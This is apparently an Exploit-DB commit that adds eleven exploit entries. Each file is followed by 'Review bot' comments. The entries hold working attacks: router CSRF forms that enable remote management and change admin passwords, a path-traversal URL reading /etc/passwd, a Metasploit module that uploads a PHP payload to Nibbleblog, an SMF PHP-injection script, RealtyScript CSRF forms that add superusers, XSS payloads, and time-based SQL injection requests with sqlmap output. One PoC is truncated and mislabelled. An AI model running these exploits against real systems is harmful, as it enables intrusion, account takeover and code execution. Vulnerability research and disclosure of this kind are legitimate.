DB: 2015-10-20

11 new exploits
Offensive Security 2015-10-20 05:02:09 +00:00
parent cf23aa54a7
commit 6f9c84b590
12 changed files with 595 additions and 0 deletions


@ -34762,3 +34762,14 @@ id,file,description,date,author,platform,type,port
38483,platforms/hardware/dos/38483.txt,"TP-LINK TL-WR741N and TL-WR741ND Routers Multiple Denial of Service Vulnerabilities",2013-04-19,W1ckerMan,hardware,dos,0
38484,platforms/php/webapps/38484.rb,"Wordpress Ajax Load More Plugin < 2.8.2 - File Upload Vulnerability",2015-10-18,PizzaHatHacker,php,webapps,0
38486,platforms/windows/local/38486.py,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow",2015-10-18,"yokoacc, nudragn, rungga_reksya",windows,local,0
38487,platforms/php/webapps/38487.txt,"WordPress Colormix Theme Multiple Security Vulnerablities",2013-04-21,MustLive,php,webapps,0
38488,platforms/hardware/webapps/38488.txt,"Belkin Router N150 1.00.08_ 1.00.09 - Path Traversal Vulnerability",2015-10-19,"Rahul Pratap Singh",hardware,webapps,0
38489,platforms/php/remote/38489.rb,"Nibbleblog File Upload Vulnerability",2015-10-19,metasploit,php,remote,0
38490,platforms/multiple/dos/38490.txt,"Adobe Flash IExternalizable.writeExternal - Type Confusion",2015-10-19,"Google Security Research",multiple,dos,0
38491,platforms/php/webapps/38491.php,"SMF 'index.php' HTML injection and Multiple PHP Code Injection Vulnerabilities",2013-04-23,"Jakub Galczyk",php,webapps,0
38492,platforms/hardware/remote/38492.html,"TP-Link TL-WR1043N Router Cross Site Request Forgery Vulnerability",2013-04-24,"Jacob Holcomb",hardware,remote,0
38493,platforms/hardware/remote/38493.txt,"Cisco Linksys WRT310N Router Multiple Denial of Service Vulnerabilities",2013-04-23,"Carl Benedict",hardware,remote,0
38494,platforms/php/webapps/38494.txt,"WordPress WP Super Cache Plugin Remote PHP Code Execution Vulnerability",2013-04-24,anonymous,php,webapps,0
38495,platforms/hardware/remote/38495.html,"Belkin F5D8236-4 Router Cross Site Request Forgery Vulnerability",2013-04-25,"Jacob Holcomb",hardware,remote,0
38496,platforms/php/webapps/38496.txt,"RealtyScript 4.0.2 - Multiple CSRF And Persistent XSS Vulnerabilities",2015-10-19,LiquidWorm,php,webapps,0
38497,platforms/php/webapps/38497.txt,"RealtyScript 4.0.2 - Multiple Time-based Blind SQL Injection Vulnerabilities",2015-10-19,LiquidWorm,php,webapps,0
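Review bot: the description for id 38492 ("TP-Link TL-WR1043N Router Cross Site Request Forgery Vulnerability") does not match the file it points at: 38492.html in this same commit carries the title "Cisco WRT310Nv2 Firmware v2.0.01 CSRF/XSS", so either the csv row or the file body is wrong and the two should be reconciled before merge. Id 38485 is also absent from the otherwise contiguous run 38483..38497 with no explanation in the commit message.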



@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/59442/info
The TP-Link TL-WR1043N Router is prone to a cross-site request-forgery vulnerability.
Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected device.
d> <title>Cisco WRT310Nv2 Firmware v2.0.01 CSRF/XSS</title> <!--*Discovered by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators --> </head> <body> <form name="CSRFxssPWN" action="http://ww.example.com/apply.cgi" method="post"/> <input type="hidden" name="submit_button" value="Management"/> <input type="hidden" name="action" value="Apply"/> <input type="hidden" name="PasswdModify" value="1"/> <input type="hidden" name="http_enable" value="1"/> <input type="hidden" name="wait_time" value="0"/> <input type="hidden" name="http_passwd" value="ISE_1337"/> <input type="hidden" name="http_passwdConfirm" value="ISE_1337"/> <input type="hidden" name="_http_enable" value="1"/> <input type="hidden" name="remote_management" value="1"/> <input type="hidden" name="remote_upgrade" value="1"/> <input type="hidden" name="remote_ip_any" value="1"/> <input type="hidden" name="http_wanport" value="1337"/> <input type="hidden" name="upnp_enable" value="1"/> <input type="hidden" name="upnp_config" value="1"/> <input type="hidden" name="upnp_internet_dis" value="1"/> </form> <script> function PwN() {document.CSRFxssPWN.submit();}; window.setTimeout(PwN, 0025); </script> <body> </html>
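Review bot: the PoC body is truncated and inconsistent with its own header: it starts mid-tag at 'd> <title>', so the opening '<html> <head' is lost, the document is closed with a second '<body>' where '</body>' belongs, and the title names the Cisco WRT310Nv2 while the source line above and the csv row describe the TP-Link TL-WR1043N. Confirm which advisory this file belongs to and commit the complete original file rather than this collapsed one-line form. The host 'ww.example.com' also looks like a typo for the usual 'www.example.com' placeholder.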


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/59445/info
The Cisco Linksys WRT310N Router is prone to multiple denial-of-service vulnerabilities when handling specially crafted HTTP requests.
Successful exploits will cause the device to crash, denying service to legitimate users.
http://www.example.com/apply.cgi?pptp_dhcp=0&submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&dhcp_check=&lan_netmask_0=&lan_netmask_1=&lan_netmask_2=&lan_netmask_3=&timer_interval=30&language=EN&wan_proto=dhcp&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&url_address=my.wrt310n&lan_proto=dhcp&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=AAAAAAAAAAAAAAAAAAA&time_zone=-08+1+1&_daylight_time=1
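Review bot: the text announces multiple denial-of-service vulnerabilities, but only one request is given and nothing states the firmware version it was confirmed on or which field is the trigger (the oversized 'wan_wins_3=AAAAAAAAAAAAAAAAAAA' value is the only non-default one in the request). A one-line note naming the affected firmware and the overlong parameter would let a defender match this entry against a device and write a request filter for it.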


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/59476/info
Belkin F5D8236-4 Router is prone to a cross-site request-forgery vulnerability.
Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected device.
<html> <head> <title>Belkin F5D8236-4 v2 CSRF - Enable Remote MGMT.</title> <!-- Use JavaScript debugging to bypass authentication --> <!--*Discovered by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators --> </head> <body> <form name="belkin" action="http://X.X.X.X/cgi-bin/system_setting.exe" method="post"/> <input type="hidden" name="remote_mgmt_enabled" value="1"/> <input type="hidden" name="remote_mgmt_port" value="31337"/> <input type="hidden" name="allow_remote_ip" value="0"/> </form> <script> function BeLkIn() {document.belkin.submit();}; window.setTimeout(BeLkIn, 0000); </script> <body> </html>
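Review bot: the comment "Use JavaScript debugging to bypass authentication" is left unexplained; if it means the request only succeeds in a browser that already holds an authenticated admin session, say so, since that precondition is what a defender needs to know. As in the other CSRF file in this commit, the trailing '<body>' should be '</body>', and '<form ... method="post"/>' self-closes a non-void element, which is not valid HTML; the affected firmware version is also not stated anywhere in the file.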


@ -0,0 +1,29 @@
# Title: Path Traversal Vulnerability
# Product: Belkin Router N150
# Author: Rahul Pratap Singh
# Website: https://0x62626262.wordpress.com
# Contact:
Linkedin: https://in.linkedin.com/in/rahulpratapsingh94
Twitter: @0x62626262
# Vendor Homepage: http://www.belkin.com
# Firmware Tested: 1.00.08, 1.00.09
# CVE: 2014-2962
Description:
Belkin N150 wireless router firmware versions 1.00.07 and earlier contain a
path traversal vulnerability through the built-in web interface. The
webproc cgi
module accepts a getpage parameter which takes an unrestricted file path as
input. The web server runs with root privileges by default, allowing a
malicious attacker to read any file on the system.
A patch was released by Belkin but that is still vulnerable.
POC:
http://192.168.2.1/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo
#root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/sh
#tw:x:504:504::/home/tw:/bin/bash #tw:x:504:504::/home/tw:/bin/msh
Ref:
https://www.kb.cert.org/vuls/id/774788
https://0x62626262.wordpress.com/category/full-disclosure/
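Review bot: the version statement contradicts itself: the description says firmware 1.00.07 and earlier are affected, the header says 1.00.08 and 1.00.09 were tested, and "A patch was released by Belkin but that is still vulnerable" is the only hint that the later firmware is affected too. State plainly that 1.00.08 and 1.00.09 (post-patch) were confirmed vulnerable so the body agrees with the csv row, which lists exactly those versions. Write the identifier as CVE-2014-2962 rather than "CVE: 2014-2962", and split the two sample output lines, each of which runs two /etc/passwd entries together on one line.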


@ -0,0 +1,13 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=547
If IExternalizable.writeExternal is overridden with a value that is not a function, Flash assumes it is a function even though it is not one. This leads to execution of a 'method' outside of the ActionScript object's ActionScript vtable, leading to memory corruption.
A sample swf is attached. ActionScript code is also attached, but it does not compile to the needed to swf. To get the PoC, decompress the swf using flasm -x myswf, and then search for "triteExternal" and change it to "writeExternal".
This bug is in the AVM serializer (http://hg.mozilla.org/tamarin-redux/file/5571cf86fc68/core/AvmSerializer.cpp), and is type confusion when calling the method writeExternal, which is implemented when a class extends IExternalizable (http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/utils/IExternalizable.html). The method is resolved on line 1437 of AvmSerializer.cpp by calling toplevel->getBinding, which does not guarantee that the binding is a method binding. It then gets cast to a method on line 773 and called, which is type confusion.
One challenge with the bug is actually creating a SWF which can hit this code, as usually overriding a defined method will lead to an illegal override exception. The 0-day author did this differently than I did. The code where all class properties (methods, internal classes, variables, etc.) are resolved is in http://hg.mozilla.org/tamarin-redux/file/5571cf86fc68/core/Traits.cpp. You can see on line 813 that a check that no two properties of a class have the same name is commented out due to some legitimate SWFs doing that. This means that a SWF can have a variable with the same name as a method (overriding a method with less restrictive method is still illegal), which is how my PoC overrode the method. The 0-day did something slightly different, it put the redefinition of writeExternal in a different public namespace than the original definition of writeExternal. This has the benefit that the ActionScript will compile and hit the bug without modification.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38490.zip
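Review bot: the build instructions refer to attachments from the original Google issue ("A sample swf is attached. ActionScript code is also attached"), but this entry only links a zip, so say what the zip contains (the swf, the .as source, or both). "does not compile to the needed to swf" should read "does not compile to the needed swf". The line references (1437 and 773 in AvmSerializer.cpp, 813 in Traits.cpp) are pinned to hg revision 5571cf86fc68, which is good; the "0-day author" comparison names no sample or reference, so readers cannot verify it.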

platforms/php/remote/38489.rb Executable file

@ -0,0 +1,160 @@
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(
info,
'Name' => 'Nibbleblog File Upload Vulnerability',
'Description' => %q{
Nibbleblog contains a flaw that allows a authenticated remote
attacker to execute arbitrary PHP code. This module was
tested on version 4.0.3.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Vulnerability Disclosure - Curesec Research Team. Author's name?
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
],
'References' =>
[
['URL', 'http://blog.curesec.com/article/blog/NibbleBlog-403-Code-Execution-47.html']
],
'DisclosureDate' => 'Sep 01 2015',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Nibbleblog 4.0.3', {}]],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),
OptString.new('USERNAME', [true, 'The username to authenticate with']),
OptString.new('PASSWORD', [true, 'The password to authenticate with'])
], self.class)
end
def username
datastore['USERNAME']
end
def password
datastore['PASSWORD']
end
def check
cookie = do_login(username, password)
return Exploit::CheckCode::Detected unless cookie
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'admin.php'),
'cookie' => cookie,
'vars_get' => {
'controller' => 'settings',
'action' => 'general'
}
)
if res && res.code == 200 && res.body.include?('Nibbleblog 4.0.3 "Coffee"')
return Exploit::CheckCode::Appears
end
Exploit::CheckCode::Safe
end
def do_login(user, pass)
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'admin.php')
)
fail_with(Failure::Unreachable, 'No response received from the target.') unless res
session_cookie = res.get_cookies
vprint_status("#{peer} - Logging in...")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin.php'),
'cookie' => session_cookie,
'vars_post' => {
'username' => user,
'password' => pass
}
)
return session_cookie if res && res.code == 302 && res.headers['Location']
nil
end
def exploit
unless [ Exploit::CheckCode::Detected, Exploit::CheckCode::Appears ].include?(check)
print_error("Target does not appear to be vulnerable.")
return
end
vprint_status("#{peer} - Authenticating using #{username}:#{password}")
cookie = do_login(username, password)
fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil?
vprint_good("#{peer} - Authenticated with Nibbleblog.")
vprint_status("#{peer} - Preparing payload...")
payload_name = "#{Rex::Text.rand_text_alpha_lower(10)}.php"
data = Rex::MIME::Message.new
data.add_part('my_image', nil, nil, 'form-data; name="plugin"')
data.add_part('My image', nil, nil, 'form-data; name="title"')
data.add_part('4', nil, nil, 'form-data; name="position"')
data.add_part('', nil, nil, 'form-data; name="caption"')
data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"image\"; filename=\"#{payload_name}\"")
data.add_part('1', nil, nil, 'form-data; name="image_resize"')
data.add_part('230', nil, nil, 'form-data; name="image_width"')
data.add_part('200', nil, nil, 'form-data; name="image_height"')
data.add_part('auto', nil, nil, 'form-data; name="image_option"')
post_data = data.to_s
vprint_status("#{peer} - Uploading payload...")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'admin.php'),
'vars_get' => {
'controller' => 'plugins',
'action' => 'config',
'plugin' => 'my_image'
},
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data,
'cookie' => cookie
)
if res && /Call to a member function getChild\(\) on a non\-object/ === res.body
fail_with(Failure::Unknown, 'Unable to upload payload. Does the server have the My Image plugin installed?')
elsif res && !( res.body.include?('<b>Warning</b>') || res.body.include?('warn') )
fail_with(Failure::Unknown, 'Unable to upload payload.')
end
vprint_good("#{peer} - Uploaded the payload.")
php_fname = 'image.php'
payload_url = normalize_uri(target_uri.path, 'content', 'private', 'plugins', 'my_image', php_fname)
vprint_status("#{peer} - Parsed response.")
register_files_for_cleanup(php_fname)
vprint_status("#{peer} - Executing the payload at #{payload_url}.")
send_request_cgi(
'uri' => payload_url,
'method' => 'GET'
)
end
end
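Review bot: check returns Exploit::CheckCode::Detected when do_login yields no cookie, and exploit accepts Detected, so a run with bad credentials authenticates twice (once in check, once in exploit) before failing with Failure::NoAccess; either return Safe or Unknown from check on a failed login or have exploit require Appears. do_login also treats any 302 carrying a Location header as a successful login, so a redirect back to the login form would be reported as a valid session; compare the redirect target. Smaller points: normalize_uri(target_uri, 'admin.php') in the upload request should use target_uri.path like the other calls, the status line "Parsed response." follows no parsing, the version check only recognises the literal string 'Nibbleblog 4.0.3 "Coffee"' so any other build reports Safe, and the Author entry still carries the TODO "Author's name?".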

platforms/php/webapps/38487.txt Executable file

@ -0,0 +1,23 @@
source: http://www.securityfocus.com/bid/59371/info
The Colormix theme for WordPress is prone to multiple security vulnerabilities, including:
1. A cross-site scripting vulnerability
2. A path-disclosure vulnerability
3. Multiple content-spoofing vulnerabilities
An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
Content spoofing:
http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?config=1.xml
http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://www.example1.com
http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg
http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
Cross-site scripting:
http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
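Review bot: every issue shown lies in the bundled jwplayer.swf (the config, abouttext/aboutlink, file/image and colour parameters, and the data: URI accepted by aboutlink), not in the theme's own PHP, so the entry should name the JW Player version shipped with Colormix and state that updating or removing the bundled player remediates it. Item 2 of the list, the path-disclosure vulnerability, has no corresponding example.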

platforms/php/webapps/38491.php Executable file

@ -0,0 +1,42 @@
source: http://www.securityfocus.com/bid/59409/info
SMF is prone to an HTML-injection and multiple PHP code-injection vulnerabilities.
An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the affected application and inject hostile HTML and script code into vulnerable sections of the application.
SMF 2.0.4 is vulnerable; other versions may also be affected.
<?php
// proof of concept that latest SMF (2.0.4) can be exploited by php injection.
// payload code must escape from \', so you should try with something like
// that:
// p0c\';phpinfo();// as a 'dictionary' value. Same story for locale
// parameter.
// For character_set - another story, as far as I remember, because here we
// have
// a nice stored xss. ;)
// 21/04/2013
// http://HauntIT.blogspot.com
// to successfully exploit smf 2.0.4 we need correct admin's cookie:
$cookie = 'SMFCookie956=allCookiesHere';
$ch =
curl_init('http://smf_2.0.4/index.php?action=admin;area=languages;sa=editlang;lid=english');
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_POST, 1); // send as POST (to 'On')
curl_setopt($ch, CURLOPT_POSTFIELDS,
"character_set=en&locale=helloworld&dictionary=p0c\\';phpinfo();//&spelling=american&ce0361602df1=c6772abdb6d5e3f403bd65e3c3c2a2c0&save_main=Save");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$page = curl_exec($ch);
echo 'PHP code:<br>'.$page;
curl_close($ch); // to close 'logged-in' part
?>
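Review bot: the 'ce0361602df1=c6772abdb6d5e3f403bd65e3c3c2a2c0' field in the POST body is a session-specific form token, so the hard-coded value can only have matched the author's own session; the comment block should say that the value is session-specific rather than presenting the script as runnable as-is. The host 'smf_2.0.4' is a placeholder and should be marked as one, and the comment "to close 'logged-in' part" on curl_close is misleading, since closing the handle does not end the session.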


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/59470/info
The WP Super Cache plugin for WordPress is prone to a remote PHP code-execution vulnerability.
An attacker can exploit this issue to execute arbitrary PHP code within the context of the web server.
WP Super Cache 1.2 is vulnerable; other versions may also be affected.
<!?mfunc echo PHP_VERSION; ?><!?/mfunc?>
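Review bot: the entry gives one payload line and nothing about where it is submitted or which plugin version fixed it, so a defender cannot confirm whether an installation is affected; add the fixed version from the plugin changelog and the input vector. The '<!?mfunc ... ?><!?/mfunc?>' spelling also looks like an extraction artefact of an HTML-comment style tag and should be checked against the source advisory.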

platforms/php/webapps/38496.txt Executable file

@ -0,0 +1,183 @@

RealtyScript v4.0.2 Multiple CSRF And Persistent XSS Vulnerabilities
Vendor: Next Click Ventures
Product web page: http://www.realtyscript.com
Affected version: 4.0.2
Summary: RealtyScript is award-winning real estate software that makes
it effortless for a real estate agent, office, or entrepreneur to be
up and running with a real estate web site in minutes. The software
is in daily use on thousands of domain names in over 40 countries and
has been translated into over 25 languages.
Desc: The application allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site. Multiple
cross-site scripting vulnerabilities were also discovered. The issue
is triggered when input passed via the multiple parameters is not
properly sanitized before being returned to the user. This can be
exploited to execute arbitrary HTML and script code in a user's browser
session in context of an affected site.
Tested on: Apache/2.4.6 (CentOS)
PHP/5.4.16
MariaDB-5.5.41
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5269
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5269.php
01.10.2015
---
Dork: "Powered by RealtyScript v4.0.2"
--------------------
Upload Stored XSS:
POST parameter: file
--------------------
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://TARGET/admin/tools.php", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryuKWlJIoMCsN4MJyN");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
xhr.withCredentials = true;
var body = "------WebKitFormBoundaryuKWlJIoMCsN4MJyN\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"xss_csv.csv\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\"\x3e\x3cscript\x3ealert(\"ZSL\")\x3c/script\x3e\r\n" +
"------WebKitFormBoundaryuKWlJIoMCsN4MJyN--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit XSS #1" onclick="submitRequest();" />
</form>
</body>
</html>
--------------
CSRF Add User:
--------------
<html>
<body>
<form action="http://TARGET/admin/addusers.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="package" value="3" />
<input type="hidden" name="realtor_first_name" value="Tester" />
<input type="hidden" name="realtor_last_name" value="Testowsky" />
<input type="hidden" name="realtor_company_name" value="Zero Science Lab" />
<input type="hidden" name="realtor_description" value="1" />
<input type="hidden" name="location1" value="&#13;" />
<input type="hidden" name="realtor_address" value="1" />
<input type="hidden" name="realtor_zip_code" value="2" />
<input type="hidden" name="realtor_phone" value="3" />
<input type="hidden" name="realtor_fax" value="4" />
<input type="hidden" name="realtor_mobile" value="5" />
<input type="hidden" name="realtor_e_mail" value="lab@zeroscience.mk" />
<input type="hidden" name="realtor_website" value="&#13;" />
<input type="hidden" name="realtor_login" value="Adminized" />
<input type="hidden" name="realtor_password" value="123456" />
<input type="hidden" name="realtor_password_2" value="123456" />
<input type="hidden" name="submit_realtor" value="Register" />
<input type="submit" value="Forge User" />
</form>
</body>
</html>
------------------------------
CSRF Add SUPERUSER:
Level SUPERUSER for SUPERUSER
Level Global for Administrator
------------------------------
<html>
<body>
<form action="http://TARGET/admin/editadmins.php" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="login" value="joxypoxy" />
<input type="hidden" name="password" value="123456" />
<input type="hidden" name="level" value="SUPERUSER" />
<input type="hidden" name="submit_admin" value="Add" />
<input type="submit" value="Forge SUPERUSER" />
</form>
</body>
</html>
-----------------------------
Stored XSS:
POST parameter: location_name
-----------------------------
<html>
<body>
<form action="http://TARGET/admin/locations.php?action=add" method="POST">
<input type="hidden" name="location_name" value='"><script>confirm(2)</script>' />
<input type="hidden" name="location_parent" value="0" />
<input type="hidden" name="submit" value="submit" />
<input type="submit" value="Submit XSS #2" />
</form>
</body>
</html>
----------------------------
IFRAME Injection Stored XSS:
POST parameter: text
----------------------------
<html>
<body>
<form action="http://TARGET/admin/pages.php?action=add" method="POST">
<input type="hidden" name="menu" value="TESTINGUSIFRAME" />
<input type="hidden" name="menu2" value="" />
<input type="hidden" name="menu3" value="" />
<input type="hidden" name="menu4" value="" />
<input type="hidden" name="menu5" value="" />
<input type="hidden" name="menu6" value="" />
<input type="hidden" name="menu7" value="" />
<input type="hidden" name="menu8" value="" />
<input type="hidden" name="menu9" value="" />
<input type="hidden" name="menu10" value="" />
<input type="hidden" name="menu11" value="" />
<input type="hidden" name="menu12" value="" />
<input type="hidden" name="menu13" value="" />
<input type="hidden" name="string" value="iframe101" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="navigation" value="1" />
<input type="hidden" name="text" value='Waddudp <br /><iframe frameborder="0" height="200" name="AAA" scrolling="no" src="http://zeroscience.mk/en" title="BBB" width="200"></iframe><br />' />
<input type="hidden" name="text2" value="" />
<input type="hidden" name="text3" value="" />
<input type="hidden" name="text4" value="" />
<input type="hidden" name="text5" value="" />
<input type="hidden" name="text6" value="" />
<input type="hidden" name="text7" value="" />
<input type="hidden" name="text8" value="" />
<input type="hidden" name="text9" value="" />
<input type="hidden" name="text10" value="" />
<input type="hidden" name="text11" value="" />
<input type="hidden" name="text12" value="" />
<input type="hidden" name="text13" value="" />
<input type="hidden" name="submit" value="Add Page" />
<input type="submit" value="Submit XSS #3" />
</form>
</body>
</html>
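Review bot: none of the five PoC sections says where the stored payload is rendered back or whether the vendor has shipped a fix, so the issue cannot be verified closed; add a fixed-version line (or "no fix at time of writing") and the output location for the file, location_name and text parameters. The "Tested on:" block lists Apache on one line and PHP and MariaDB as unlabelled continuation lines, and the legend "Level SUPERUSER for SUPERUSER / Level Global for Administrator" belongs in the description rather than inside the section rule.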

platforms/php/webapps/38497.txt Executable file

@ -0,0 +1,104 @@

RealtyScript v4.0.2 Multiple Time-based Blind SQL Injection Vulnerabilities
Vendor: Next Click Ventures
Product web page: http://www.realtyscript.com
Affected version: 4.0.2
Summary: RealtyScript is award-winning real estate software that makes
it effortless for a real estate agent, office, or entrepreneur to be
up and running with a real estate web site in minutes. The software
is in daily use on thousands of domain names in over 40 countries and
has been translated into over 25 languages.
Desc: RealtyScript suffers from multiple SQL Injection vulnerabilities.
Input passed via the GET parameter 'u_id' and the POST parameter 'agent[]'
is not properly sanitised before being returned to the user or used in
SQL queries. This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.
Tested on: Apache/2.4.6 (CentOS)
PHP/5.4.16
MariaDB-5.5.41
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5270
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5270.php
01.10.2015
--
(1)
GET /admin/users.php?req=remove&u_id=103 and (select * from (select(sleep(66)))a)-- & HTTP/1.1
(2)
POST /admin/mailer.php HTTP/1.1
Host: TARGET
Content-Length: 62
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://TARGET
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://TARGET/admin/mailer.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=vaq21340scj2u53a1b96ehvid5;
agent[]=102 and (select * from (select(sleep(67)))a)-- &subject=test&message=t00t^^&submit_mailer=Send
====================================== .sqlmap session output =======================================
$ sqlmap -r request1.txt -p "u_id" --dbms=MySQL --os=Linux --sql-query="SELECT @@version"
_
___ ___| |_____ ___ ___ {1.0-dev-04c1d43}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal.
[*] starting at 14:36:36
[14:36:36] [INFO] parsing HTTP request from 'request1.txt'
[14:36:36] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: u_id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: req=remove&u_id=103 AND (SELECT * FROM (SELECT(SLEEP(5)))YrMM)
---
[14:36:36] [INFO] testing MySQL
[14:36:36] [INFO] confirming MySQL
[14:36:36] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >= 5.0.0
[14:36:36] [INFO] fetching SQL SELECT statement query output: 'SELECT @@version'
[14:36:36] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[14:36:45] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[14:37:03] [INFO] adjusting time delay to 2 seconds due to good response times
5.5.41-MariaDB
SELECT @@version: '5.5.41-MariaDB'
[14:38:50] [INFO] fetched data logged to text files under '/.sqlmap/output/TARGET'
[*] shutting down at 14:38:50
======================================= sqlmap session output. ======================================
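Review bot: the sqlmap transcript reports "a total of 0 HTTP(s) requests", meaning it was resumed from a saved session, so it replays a stored result rather than demonstrating detection; rerun with a clean session or state that it is a resumed run. The advisory also omits the fix: u_id and agent[] should be bound as integer parameters in the underlying queries, and a line saying whether a patched version exists would let defenders check their installation. As in the companion advisory, the "Tested on:" block leaves the PHP and MariaDB lines unlabelled.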